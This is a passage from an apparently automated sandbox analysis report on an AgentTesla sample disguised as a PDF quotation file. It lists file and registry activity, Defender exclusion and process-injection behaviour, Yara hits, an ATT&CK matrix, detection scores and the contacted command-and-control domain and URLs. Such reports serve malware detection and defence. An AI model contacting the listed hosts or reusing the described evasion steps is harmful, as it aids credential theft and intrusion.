                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: svchost.exe, 00000007.00000002.506679598.000002B19E23D000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000007.00000002.509083393.000002B19E302000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000001B.00000002.497563880.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.544137822.0000000003D04000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ - REF 208056-pdf.exe PID: 6556, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORY
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.47b10f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.47b10f0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.477aed0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.477aed0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000001B.00000002.497563880.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.544137822.0000000003D04000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ - REF 208056-pdf.exe PID: 6556, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORY
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.47b10f0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.47b10f0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.477aed0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.svchost.exe.477aed0.6.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Registry Run Keys / Startup Folder11Access Token Manipulation1Software Packing1NTDSSecurity Software Discovery241Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptWindows Service1Timestomp1LSA SecretsVirtualization/Sandbox Evasion24SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonProcess Injection212DLL Side-Loading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder11Masquerading221DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion24Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection212Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358398 Sample: RFQ - REF 208056-pdf.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 48 coroloboxorozor.com 2->48 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 8 other signatures 2->64 8 RFQ - REF 208056-pdf.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 process4 dnsIp5 50 coroloboxorozor.com 172.67.172.17, 49708, 49730, 49736 CLOUDFLARENETUS United States 8->50 42 C:\Windows\Microsoft.NET\...\svchost.exe, PE32 8->42 dropped 44 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->46 dropped 66 Creates an autostart registry key pointing to binary in C:\Windows 8->66 68 Adds a directory exclusion to Windows Defender 8->68 70 Hides threads from debuggers 8->70 72 Injects a PE file into a foreign processes 8->72 19 AdvancedRun.exe 1 8->19         started        21 cmd.exe 8->21         started        23 powershell.exe 23 8->23         started        25 powershell.exe 8->25         started        74 Drops executables to the windows directory (C:\Windows) and starts them 13->74 27 svchost.exe 13->27         started        76 Changes security center settings (notifications, updates, antivirus, firewall) 15->76 52 127.0.0.1 unknown unknown 17->52 file6 signatures7 process8 dnsIp9 31 AdvancedRun.exe 19->31         started        34 conhost.exe 21->34         started        36 timeout.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        54 coroloboxorozor.com 27->54 78 System process connects to network (likely due to code injection or exploit) 27->78 80 Multi AV Scanner detection for dropped file 27->80 82 Machine Learning detection for dropped file 27->82 84 Tries to delay execution (extensive OutputDebugStringW loop) 27->84 signatures10 process11 dnsIp12 56 192.168.2.1 unknown unknown 31->56

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RFQ - REF 208056-pdf.exe18%VirustotalBrowse
                      RFQ - REF 208056-pdf.exe32%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                      RFQ - REF 208056-pdf.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe0%ReversingLabs
                      C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe32%ReversingLabsByteCode-MSIL.Trojan.Pwsx

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      16.0.svchost.exe.d60000.0.unpack100%AviraTR/Dropper.GenDownload File
                      16.2.svchost.exe.d60000.0.unpack100%AviraTR/Dropper.GenDownload File
                      0.2.RFQ - REF 208056-pdf.exe.50000.0.unpack100%AviraTR/Dropper.GenDownload File
                      0.0.RFQ - REF 208056-pdf.exe.50000.0.unpack100%AviraTR/Dropper.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      coroloboxorozor.com15%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://coroloboxorozor.com15%VirustotalBrowse
                      http://coroloboxorozor.com0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html15%VirustotalBrowse
                      http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html0%Avira URL Cloudsafe
                      http://crl.microsoft.co0%VirustotalBrowse
                      http://crl.microsoft.co0%Avira URL Cloudsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://coroloboxorozor.com/base/7DD0ECB3FED3970A09258155874027F0.html0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.microsoft.coaHp0%Avira URL Cloudsafe
                      http://coroloboxorozor.com/base/67CF952D671D30AE6DA37F3E241170D6.html0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.m0%URL Reputationsafe
                      http://crl.m0%URL Reputationsafe
                      http://crl.m0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      coroloboxorozor.com
                      		172.67.172.17
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.htmltrue
                      • 15%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://coroloboxorozor.com/base/7DD0ECB3FED3970A09258155874027F0.htmltrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://coroloboxorozor.com/base/67CF952D671D30AE6DA37F3E241170D6.htmltrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://ocsp.sectigo.com0RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpfalse
                        		high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                          		high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpfalse
                            		high
                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpfalse
                              		high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                		high
                                http://coroloboxorozor.comRFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmptrue
                                • 15%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000005.00000003.307049363.00000243FF042000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                    		high
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.307021748.00000243FF04A000.00000004.00000001.sdmpfalse
                                      		high
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000002.307267041.00000243FF029000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000003.307049363.00000243FF042000.00000004.00000001.sdmpfalse
                                          		high
                                          http://crl.microsoft.copowershell.exe, 00000011.00000002.551437427.0000000009B51000.00000004.00000001.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://sectigo.com/CPS0CRFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
